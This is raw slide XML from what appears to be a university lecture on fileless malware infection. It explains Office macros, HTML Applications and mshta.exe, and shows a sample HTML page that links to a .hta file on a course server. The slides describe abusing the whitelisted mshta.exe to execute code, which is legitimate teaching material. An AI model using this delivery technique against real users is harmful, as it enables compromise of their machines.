            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>jokelove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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18</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203160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less-fi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16832"/>
            <a:ext cx="5422032" cy="4833653"/>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D594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>One-click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Infection  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Himanshu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Anand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chastine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Menrige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364585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dirty="0" smtClean="0"/>
              <a:t>根據</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>微軟的介紹，巨集是可以用來將重複性作業自動化的一系列命令，且可以在需要進行該作業時執行。雖然巨集很方便，但是也被惡意程式濫用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>巨集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Macro</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D594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2703623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2675467"/>
            <a:ext cx="8568951" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>staff.csie.ncu.edu.tw/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hsufh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/COURSES/SPRING2023/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>test1.hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;Click me&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A Hyperlink to a HTA File in an HTML File</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2967812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1" y="2492896"/>
            <a:ext cx="8568952" cy="3633267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>HTML Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> program whose source code consists of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Dynamic HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and one or more scripting languages supported by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Internet Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTML is used to generate the user interface, and the scripting language is used for the program logic. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTA executes without the constraints of the internet browser security model; in fact, it executes as a “fully trusted” application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The usual file extension of an HTA is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>雖然用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>編寫，卻比普通網頁權限大得多。它具有桌面程序的所有權限（讀寫文件、操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>註冊表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:latin typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
                <a:ea typeface="標楷體" panose="03000509000000000000" pitchFamily="65" charset="-120"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>想冲大厂的癞蛤蟆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRP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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTML Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>wikepedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="844868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72067" y="2675467"/>
            <a:ext cx="7876397" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> file will be interpreted by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> every time you double click to execute the file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is a signed Microsoft application that runs Microsoft HTML Applications (HTA) files. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are HTML files that execute JavaScript or VBScript outside of the browser, with the full permission of the executing user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>it is from Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is normally whitelisted and will allow us to execute code under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>process.</a:t>
            </a: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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Đỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Anh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>cyber one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
